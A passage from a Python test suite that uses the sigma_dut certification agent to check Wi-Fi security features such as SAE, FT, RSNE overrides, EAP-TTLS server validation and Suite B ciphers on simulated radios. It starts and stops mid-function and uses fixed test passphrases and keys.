sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae(dev, apdev):
"""sigma_dut controlled SAE association"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19 20 21'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
res = sigma_dut_cmd_check("sta_get_parameter,interface,%s,Parameter,PMK" % ifname)
logger.info("Reported PMK: " + res)
if ",PMK," not in res:
raise Exception("PMK not reported");
if hapd.request("GET_PMK " + dev[0].own_addr()) != res.split(',')[3]:
raise Exception("Mismatch in reported PMK")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID,20" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '20':
raise Exception("Expected SAE group not used")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_groups(dev, apdev):
"""sigma_dut controlled SAE association with group negotiation"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID,21 20 19" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_pmkid_include(dev, apdev):
"""sigma_dut controlled SAE association with PMKID"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params["sae_confirm_immediate"] = "1"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,PMKID_Include,enable" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_password(dev, apdev):
"""sigma_dut controlled SAE association and long password"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['sae_password'] = 100*'B'
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", 100*'B'))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_pw_id(dev, apdev):
"""sigma_dut controlled SAE association with Password Identifier"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_password'] = 'secret|id=pw id'
params['sae_groups'] = '19'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,AKMSuiteType,8;9,PasswordID,pw id" % (ifname, "test-sae", "secret"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_pw_id_pwe_loop(dev, apdev):
"""sigma_dut controlled SAE association with Password Identifier and forced PWE looping"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_password'] = 'secret|id=pw id'
params['sae_groups'] = '19'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,AKMSuiteType,8;9,PasswordID,pw id,sae_pwe,looping" % (ifname, "test-sae", "secret"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
for i in range(3):
ev = dev[0].wait_event(["SME: Trying to authenticate",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Network selection result not indicated")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
raise Exception("Connection reported")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_pw_id_ft(dev, apdev):
"""sigma_dut controlled SAE association with Password Identifier and FT"""
run_sigma_dut_sae_pw_id_ft(dev, apdev)
def test_sigma_dut_sae_pw_id_ft_over_ds(dev, apdev):
"""sigma_dut controlled SAE association with Password Identifier and FT-over-DS"""
run_sigma_dut_sae_pw_id_ft(dev, apdev, over_ds=True)
def run_sigma_dut_sae_pw_id_ft(dev, apdev, over_ds=False):
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['wpa_key_mgmt'] = 'SAE FT-SAE'
params["ieee80211w"] = "2"
params['sae_password'] = ['pw1|id=id1', 'pw2|id=id2', 'pw3', 'pw4|id=id4']
params['mobility_domain'] = 'aabb'
params['ft_over_ds'] = '1' if over_ds else '0'
bssid = apdev[0]['bssid'].replace(':', '')
params['nas_identifier'] = bssid + '.nas.example.com'
params['r1_key_holder'] = bssid
params['pmk_r1_push'] = '0'
params['r0kh'] = 'ff:ff:ff:ff:ff:ff * 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
params['r1kh'] = '00:00:00:00:00:00 00:00:00:00:00:00 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
if over_ds:
sigma_dut_cmd_check("sta_preset_testparameters,interface,%s,FT_DS,Enable" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,AKMSuiteType,8;9,PasswordID,id2" % (ifname, "test-sae", "pw2"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
bssid = apdev[1]['bssid'].replace(':', '')
params['nas_identifier'] = bssid + '.nas.example.com'
params['r1_key_holder'] = bssid
hapd2 = hostapd.add_ap(apdev[1], params)
bssid = hapd2.own_addr()
sigma_dut_cmd_check("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid))
dev[0].wait_connected()
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sta_override_rsne(dev, apdev):
"""sigma_dut and RSNE override on STA"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-psk"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
tests = ["30120100000fac040100000fac040100000fac02",
"30140100000fac040100000fac040100000fac02ffff"]
for test in tests:
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678"))
sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,%s" % (ifname, test))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678"))
sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,300101" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk"),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"])
if ev is None:
raise Exception("Association rejection not reported")
if "status_code=40" not in ev:
raise Exception("Unexpected status code: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk(dev, apdev):
"""sigma_dut controlled AP"""
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_pskhex(dev, apdev, params):
"""sigma_dut controlled AP and PSKHEX"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_pskhex.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
psk = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSKHEX," + psk)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", raw_psk=psk, scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sha256(dev, apdev, params):
"""sigma_dut controlled AP PSK SHA256"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sha256.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-256,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_deauth(dev, apdev, params):
"""sigma_dut controlled AP and deauth commands"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_deauth.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256",
psk="12345678", ieee80211w="2", scan_freq="2412")
addr = dev[0].own_addr()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_deauth_sta,NAME,AP,sta_mac_address," + addr)
ev = dev[0].wait_disconnected()
dev[0].dump_monitor()
if "locally_generated=1" in ev:
raise Exception("Unexpected disconnection reason")
dev[0].wait_connected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_deauth_sta,NAME,AP,sta_mac_address," + addr + ",disconnect,silent")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=5)
if ev and "locally_generated=1" not in ev:
raise Exception("Unexpected disconnection")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_eap_ttls(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS parameters"""
check_domain_match(dev[0])
logdir = params['logdir']
with open("auth_serv/ca.pem", "r") as f:
with open(os.path.join(logdir, "sigma_dut_eap_ttls.ca.pem"), "w") as f2:
f2.write(f.read())
src = "auth_serv/server.pem"
dst = os.path.join(logdir, "sigma_dut_eap_ttls.server.der")
hashdst = os.path.join(logdir, "sigma_dut_eap_ttls.server.pem.sha256")
subprocess.check_call(["openssl", "x509", "-in", src, "-out", dst,
"-outform", "DER"],
stderr=open('/dev/null', 'w'))
with open(dst, "rb") as f:
der = f.read()
hash = hashlib.sha256(der).digest()
with open(hashdst, "w") as f:
f.write(binascii.hexlify(hash).decode())
dst = os.path.join(logdir, "sigma_dut_eap_ttls.incorrect.pem.sha256")
with open(dst, "w") as f:
f.write(32*"00")
ssid = "test-wpa2-eap"
params = hostapd.wpa2_eap_params(ssid=ssid)
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
cmd = "sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,trustedRootCA,sigma_dut_eap_ttls.ca.pem,username,DOMAIN\mschapv2 user,password,password" % (ifname, ssid)
try:
tests = ["",
",Domain,server.w1.fi",
",DomainSuffix,w1.fi",
",DomainSuffix,server.w1.fi",
",ServerCert,sigma_dut_eap_ttls.server.pem"]
for extra in tests:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd + extra)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
tests = [",Domain,w1.fi",
",DomainSuffix,example.com",
",ServerCert,sigma_dut_eap_ttls.incorrect.pem"]
for extra in tests:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd + extra)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=10)
if ev is None:
raise Exception("Server certificate error not reported")
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
raise Exception("Unexpected connection reported")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_suite_b(dev, apdev, params):
"""sigma_dut controlled STA Suite B"""
check_suite_b_192_capa(dev)
logdir = params['logdir']
with open("auth_serv/ec2-ca.pem", "r") as f:
with open(os.path.join(logdir, "suite_b_ca.pem"), "w") as f2:
f2.write(f.read())
with open("auth_serv/ec2-user.pem", "r") as f:
with open("auth_serv/ec2-user.key", "r") as f2:
with open(os.path.join(logdir, "suite_b.pem"), "w") as f3:
f3.write(f.read())
f3.write(f2.read())
dev[0].flush_scan_cache()
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
params = {"ssid": "test-suite-b",
"wpa": "2",
"wpa_key_mgmt": "WPA-EAP-SUITE-B-192",
"rsn_pairwise": "GCMP-256",
"group_mgmt_cipher": "BIP-GMAC-256",
"ieee80211w": "2",
"ieee8021x": "1",
'auth_server_addr': "127.0.0.1",
'auth_server_port': "18129",
'auth_server_shared_secret': "radius",
'nas_identifier': "nas.w1.fi"}
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b.pem,trustedRootCA,suite_b_ca.pem,CertType,ECC" % (ifname, "test-suite-b"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_suite_b_rsa(dev, apdev, params):
"""sigma_dut controlled STA Suite B (RSA)"""
check_suite_b_192_capa(dev)
logdir = params['logdir']
with open("auth_serv/rsa3072-ca.pem", "r") as f:
with open(os.path.join(logdir, "suite_b_ca_rsa.pem"), "w") as f2:
f2.write(f.read())
with open("auth_serv/rsa3072-user.pem", "r") as f:
with open("auth_serv/rsa3072-user.key", "r") as f2:
with open(os.path.join(logdir, "suite_b_rsa.pem"), "w") as f3:
f3.write(f.read())
f3.write(f2.read())
dev[0].flush_scan_cache()
params = suite_b_192_rsa_ap_params()
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
cmd = "sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b_rsa.pem,trustedRootCA,suite_b_ca_rsa.pem,CertType,RSA" % (ifname, "test-suite-b")
try:
tests = ["",
",TLSCipher,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
",TLSCipher,TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"]
for extra in tests:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd + extra)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_suite_b(dev, apdev, params):
"""sigma_dut controlled AP Suite B"""
check_suite_b_192_capa(dev)
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_suite_b.sigma-hostapd")
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,SuiteB")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192",
ieee80211w="2",
openssl_ciphers="SUITEB192",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ec2-ca.pem",
client_cert="auth_serv/ec2-user.pem",
private_key="auth_serv/ec2-user.key",
pairwise="GCMP-256", group="GCMP-256",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_cipher_gcmp_128(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-128/BIP-GMAC-128 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-128", "BIP-GMAC-128",
"GCMP")
def test_sigma_dut_ap_cipher_gcmp_256(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-256/BIP-GMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256",
"GCMP-256")
def test_sigma_dut_ap_cipher_ccmp_128(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128/BIP-CMAC-128 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128", "BIP-CMAC-128",
"CCMP")
def test_sigma_dut_ap_cipher_ccmp_256(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-256/BIP-CMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-256", "BIP-CMAC-256",
"CCMP-256")
def test_sigma_dut_ap_cipher_ccmp_gcmp_1(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (1)"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256",
"BIP-GMAC-256", "CCMP")
def test_sigma_dut_ap_cipher_ccmp_gcmp_2(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (2)"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256",
"BIP-GMAC-256", "GCMP-256", "CCMP")
def test_sigma_dut_ap_cipher_gcmp_256_group_ccmp(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-256/CCMP/BIP-GMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256",
"GCMP-256", "CCMP", "AES-CCMP-128")
def run_sigma_dut_ap_cipher(dev, apdev, params, ap_pairwise, ap_group_mgmt,
sta_cipher, sta_cipher_group=None, ap_group=None):
check_suite_b_192_capa(dev)
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_cipher.sigma-hostapd")
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius")
cmd = "ap_set_security,NAME,AP,KEYMGNT,SuiteB,PMF,Required,PairwiseCipher,%s,GroupMgntCipher,%s" % (ap_pairwise, ap_group_mgmt)
if ap_group:
cmd += ",GroupCipher,%s" % ap_group
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
if sta_cipher_group is None:
sta_cipher_group = sta_cipher
dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192",
ieee80211w="2",
openssl_ciphers="SUITEB192",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ec2-ca.pem",
client_cert="auth_serv/ec2-user.pem",
private_key="auth_serv/ec2-user.key",
pairwise=sta_cipher, group=sta_cipher_group,
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_override_rsne(dev, apdev):
"""sigma_dut controlled AP overriding RSNE"""
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("dev_configure_ie,NAME,AP,interface,%s,IE_Name,RSNE,Contents,30180100000fac040200ffffffff000fac040100000fac020c00" % iface)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae(dev, apdev, params):
"""sigma_dut controlled AP with SAE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
